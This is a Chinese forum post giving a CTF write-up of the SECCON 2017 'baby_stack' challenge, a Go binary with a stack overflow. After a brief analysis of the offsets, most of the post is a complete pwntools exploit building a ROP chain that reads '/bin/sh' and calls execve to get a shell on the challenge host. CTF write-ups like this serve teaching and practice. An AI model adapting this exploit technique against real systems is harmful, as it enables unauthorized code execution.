-
-
[原创][分享]SECCON 2017 baby_stack
-
2017-12-12 14:44
6229
-
[原创][分享]SECCON 2017 baby_stack
话说跪求关注博客 http://bestwing.me
Baby Stack
一个简单的缓冲区溢题目,程序由go 语言编写而成,所以并不能直接F5去分析。
analysis
程序的main_memcpy
存在漏洞,可发生栈溢出
在调试的过程中,我们会发现一个不一样的地方
正常,我们都是rip储存着返回地址,而这确实rsp存储的,这就意味着函数入口时的rsp指向retn地址,下面跟着参数
另外还有一个问题,如果是只是单纯的"A"*192+p64(ret)
程序是会报错的,
在call main_memcpy
结束后,我们可以看到有两条汇编
.text:00000000004012A4 mov rbx, [rsp+1f8h+name.str]
.text:00000000004012AC mov [rsp+1F8h+var_E0], rbx
.text:00000000004012B4 mov rbx, [rsp+1f8h+name.len]
有两条栈操作,对象分别是name的字符串以及一个name的长度,于是我们构造一个
payload = "B" * 104 + p64(0x0000000000599940) + p64(0x200) + "D" * 8
那么剩下的事情只要构造 rop-chain就行了
思路如下,构造一个read 读入 /bin/sh , 读入地址在bss上,然后构造 execve 去执行 /bin/sh
#!/usr/bin/env python
# coding=utf-8
from pwn import *
import sys, time
context.log_level = 'debug'
context.terminal =['tmux','splitw','-h']
context.binary = "./baby_stack"
if len(sys.argv) == 1:
p = process(["./baby_stack"])
pause()
else:
p = remote("baby_stack.pwn.seccon.jp", "15285")
bss = 0x000000000059f920
syscall = 0x0000000000456889 # syscall; ret;
pop_rax_ret = 0x00000000004016ea # pop rax; ret;
pop_rsi_ret = 0x000000000046defd # pop rsi; ret;
pop_rdi_ret = 0x0000000000470931 # pop rdi; or byte ptr [rax + 0x39], cl; ret;
pop_rdx_ret = 0x00000000004a247c # pop rdx; or byte ptr [rax - 0x77], cl; ret;
p.recvuntil("name >> ")
p.sendline("A" * 0x100)
p.recvuntil("message >> ")
raw_input('---- debug ----')
payload = "B"*104+'\0'*8+p64(0x200)
payload = "B" * 104 + p64(0x0000000000599940) + p64(0x200) + "D" * 8
payload += "C" * 0x48 + p64(syscall) + p64(0x200)
payload += "E" * (0x80 + 0x40)
payload += p64(pop_rax_ret) + p64(bss)
payload += p64(pop_rdi_ret) + p64(0)
payload += p64(pop_rsi_ret) + p64(bss + 0x200)
payload += p64(pop_rdx_ret) + p64(0x100)
payload += p64(pop_rax_ret) + p64(0) # read
payload += p64(syscall)
payload += p64(pop_rax_ret) + p64(bss)
payload += p64(pop_rdi_ret) + p64(bss + 0x200)
payload += p64(pop_rsi_ret) + p64(0)
payload += p64(pop_rdx_ret) + p64(0)
payload += p64(pop_rax_ret) + p64(59) # __NR_execve
payload += p64(syscall)
gdb.attach(p,'''break *0x40129F
break *0x401465''')
pause()
p.sendline(payload)
pause()
p.sendline("/bin/sh\x00")
pause()
p.interactive()
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课